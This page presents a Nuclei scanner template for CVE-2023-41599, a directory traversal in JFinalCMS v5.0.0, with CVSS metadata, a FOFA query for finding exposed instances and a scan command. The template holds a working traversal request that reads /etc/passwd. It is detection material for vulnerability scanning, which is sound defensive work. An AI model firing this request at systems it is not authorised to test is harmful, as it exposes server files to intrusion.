JFinalCMS v5.0.0 - Directory Traversal
ID: CVE-2023-41599
Severity: medium
Author: pussycat0x
Tags: cve,cve2023,jrecms
Description
Section titled “Description”An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.
YAML Source
Section titled “YAML Source”id: CVE-2023-41599
info: name: JFinalCMS v5.0.0 - Directory Traversal author: pussycat0x severity: medium description: | An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal. reference: - https://github.com/wy876/POC/blob/main/JFinalCMS%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E(CVE-2023-41599).md - https://github.com/wy876/POC - https://github.com/xingchennb/POC- - https://github.com/Marco-zcl/POC - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-41599 cwe-id: CWE-22 epss-score: 0.00047 epss-percentile: 0.17113 cpe: cpe:2.3:a:jfinalcms_project:jfinalcms:5.0.0:*:*:*:*:*:*:* metadata: vendor: jfinalcms_project product: jfinalcms fofa-query: body="content=\"JreCms" tags: cve,cve2023,jrecms
http: - method: GET path: - "{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022015271f7018b54bca39cb3421479bb6ead533aad47374ee9107c83e425cf5989d022067da31c64c3f56cdf0991c93531a11238cc72287f16b2755e2b2ea634125d046:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-41599.yaml"